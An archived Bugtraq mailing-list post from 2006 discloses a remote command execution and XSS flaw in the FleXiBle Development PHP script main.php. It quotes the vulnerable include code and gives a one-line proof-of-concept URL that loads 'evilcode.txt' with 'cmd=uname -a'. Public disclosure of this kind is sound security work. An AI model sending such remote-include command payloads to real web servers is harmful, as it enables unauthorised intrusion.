Bugtraq: FleXiBle Development Script Remote Command Exucetion And XSS Attacking

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

FleXiBle Development Script Remote Command Exucetion And XSS Attacking

From: botan () linuxmail org
Date: 1 Apr 2006 19:15:14 -0000

Description : 

/* ================================================= 
File created by Andries Bruinsma 
(c) FleXiBle Development (FXB) 
Web: http://www.ahbruinsma.nl 
Email: renegade () clanflex com 
=================================================== 
File: main.php 
Version: 3.0 
Date started: 10th May, 2004 
Last modified : 24th January, 2006 
Last Update: New layout 

=================================================

Vulnerable 

ob_start(ob_gzhandler); 
//Defining some functions and including them 
require('php/messages.php'); 
//require base-file 
//require_once('php/base.php'); 
include_once "baseconfig.inc.php"; 


http://www.site.com/[path]/evilcode.txt?&cmd=uname -a

By Date By Thread

Current thread:

FleXiBle Development Script Remote Command Exucetion And XSS Attacking botan (Apr 01)
- <Possible follow-ups>
- Re: FleXiBle Development Script Remote Command Exucetion And XSS Attacking Steven M. Christey (Apr 09)